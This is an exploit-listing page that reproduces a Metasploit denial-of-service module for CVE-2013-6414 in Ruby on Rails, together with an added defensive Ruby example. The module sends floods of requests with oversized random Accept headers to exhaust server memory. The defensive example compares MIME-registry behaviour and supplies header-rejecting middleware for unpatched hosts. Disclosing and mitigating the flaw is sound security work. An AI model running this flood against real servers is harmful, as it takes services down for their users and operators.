Ruby on Rails Action View MIME Memory Exhaustion

Reported: 04 Dec 2013 20:57:30
Reported by: Toby Hsieh, joev <[email protected]>, sinn3r <[email protected]>
Type: metasploit
Source: www.rapid7.com

Ruby on Rails Action View MIME Memory Exhaustion causing memory exhaustion by sending crafted content-type heade

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ruby on Rails Action View MIME Memory Exhaustion',
      'Description'    => %q{
        This module exploits a Denial of Service (DoS) condition in Action View that requires
        a controller action. By sending a specially crafted content-type header to a Rails
        application, it is possible for it to store the invalid MIME type, and may eventually
        consume all memory if enough invalid MIMEs are given.

        Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.
      },
      'Author'         =>
        [
          'Toby Hsieh', # Reported the issue
          'joev',       # Metasploit
          'sinn3r'      # Metasploit
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-6414' ],
          [ 'OSVDB', '100525' ],
          [ 'BID', '64074' ],
          [ 'URL', 'https://seclists.org/oss-sec/2013/q4/400' ],
          [ 'URL', 'https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068' ]
        ],
      'DisclosureDate' => '2013-12-04'))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('URIPATH',     [true, 'The URI that routes to a Rails controller action', '/']),
        OptInt.new('MAXSTRINGSIZE',  [true, 'Max string size', 60000]),
        OptInt.new('REQCOUNT',       [true, 'Number of HTTP requests to pipeline per connection', 1]),
        OptInt.new('RLIMIT',         [true, 'Number of requests to send', 100000])
      ],
    self.class)
  end

  def host
    host = datastore['RHOST']
    host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80
    host
  end

  def long_string
    Rex::Text.rand_text_alphanumeric(datastore['MAXSTRINGSIZE'])
  end

  #
  # Returns a modified version of the URI that:
  # 1. Always has a starting slash
  # 2. Removes all the double slashes
  #
  def normalize_uri(*strs)
    new_str = strs * "/"

    new_str = new_str.gsub!("//", "/") while new_str.index("//")

    # Makes sure there's a starting slash
    unless new_str.start_with?("/")
      new_str = '/' + new_str
    end

    new_str
  end

  def http_request
    uri = normalize_uri(datastore['URIPATH'])

    http = ''
    http << "GET #{uri} HTTP/1.1\r\n"
    http << "Host: #{host}\r\n"
    http << "Accept: #{long_string}\r\n"
    http << "\r\n"

    http
  end

  def run
    begin
      print_status("Stressing the target memory, this will take quite some time...")
      datastore['RLIMIT'].times { |i|
        connect
        datastore['REQCOUNT'].times { sock.put(http_request) }
        disconnect
      }

      print_status("Attack finished. Either the server isn't vulnerable, or please dos harder.")
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_status("Unable to connect to #{host}.")
    rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
      print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached.")
    ensure
      disconnect
    end
  end
end

=begin

Reproduce:

1. Add a def index; end to ApplicationController
2. Add an empty index.html.erb file to app/views/application/index.html.erb
3. Uncomment the last line in routes.rb
4. Hit /application

=end
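The module's description says the server "stores the invalid MIME type" for every crafted header it receives, and the reproduce steps above set up a bare controller action to observe that. The following Ruby is an added illustration, not code from the Metasploit module or from Rails: it models the two lookup behaviours side by side (a table that permanently registers every unknown string versus one that returns a transient value and keeps its table fixed), and adds a Rack-style header check a defender can place in front of an unpatched application. The class and method names (MimeType, MemoizingMimeRegistry, NonMemoizingMimeRegistry, suspicious_mime_header?, RejectSuspiciousMimeHeaders) and the MAX_ACCEPT_LENGTH bound are assumptions for this example, not Rails or Rack APIs.

```ruby
# Added example; names below are assumptions, not Rails/Rack identifiers.
MimeType = Struct.new(:string)

# Vulnerable pattern: the lookup table has a default block that stores every
# unknown key, so attacker-controlled header values grow it without bound.
class MemoizingMimeRegistry
  def initialize(known = %w[text/html application/json])
    @table = Hash.new { |h, k| h[k] = MimeType.new(k) } # stores the key
    known.each { |t| @table[t] = MimeType.new(t) }
  end

  def lookup(str)
    @table[str]
  end

  def size
    @table.size
  end
end

# Hardened pattern: known types come from a fixed table; an unknown string
# yields a throwaway object that is never added to the table.
class NonMemoizingMimeRegistry
  def initialize(known = %w[text/html application/json])
    @table = {}
    known.each { |t| @table[t] = MimeType.new(t) }
  end

  def lookup(str)
    @table[str] || MimeType.new(str) # transient, not retained
  end

  def size
    @table.size
  end
end

# Feed `count` distinct, constructed MIME strings to a registry and return how
# many entries it retains afterwards.
def simulate_growth(registry, count)
  count.times { |i| registry.lookup("junk/#{i}") }
  registry.size
end

# Assumed upper bound for a legitimate Accept / Content-Type header value.
MAX_ACCEPT_LENGTH = 1024

# True when a MIME header value is implausibly long or any comma-separated
# entry does not look like type/subtype with optional ";params".
def suspicious_mime_header?(value, max_len: MAX_ACCEPT_LENGTH)
  return false if value.nil?
  return true if value.length > max_len
  value.split(",").any? do |entry|
    entry.strip !~ %r{\A[\w.+*-]+/[\w.+*-]+(\s*;.*)?\z}
  end
end

# Rack-compatible middleware (standard env keys assumed) that rejects requests
# carrying a suspicious Accept or Content-Type header before they reach the
# application's MIME lookup.
class RejectSuspiciousMimeHeaders
  def initialize(app, max_len: MAX_ACCEPT_LENGTH)
    @app = app
    @max_len = max_len
  end

  def call(env)
    %w[HTTP_ACCEPT CONTENT_TYPE].each do |key|
      if suspicious_mime_header?(env[key], max_len: @max_len)
        return [400, { "Content-Type" => "text/plain" }, ["Bad Request\n"]]
      end
    end
    @app.call(env)
  end
end

if $PROGRAM_NAME == __FILE__
  puts "memoizing registry retains:     #{simulate_growth(MemoizingMimeRegistry.new, 500)}"
  puts "non-memoizing registry retains: #{simulate_growth(NonMemoizingMimeRegistry.new, 500)}"
  guard = RejectSuspiciousMimeHeaders.new(->(_env) { [200, {}, ["ok"]] })
  puts "normal Accept -> #{guard.call("HTTP_ACCEPT" => "text/html,*/*;q=0.8")[0]}"
  puts "60000-byte Accept -> #{guard.call("HTTP_ACCEPT" => "a" * 60000)[0]}"
end
```

Run with `ruby` to see the two registries diverge after the same input: the memoizing one retains every constructed string while the non-memoizing one stays at its two seeded types. The middleware is a stop-gap for hosts that cannot be upgraded to 4.0.2 or 3.2.16 immediately; the length bound is deliberately generous so ordinary browser Accept headers pass.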
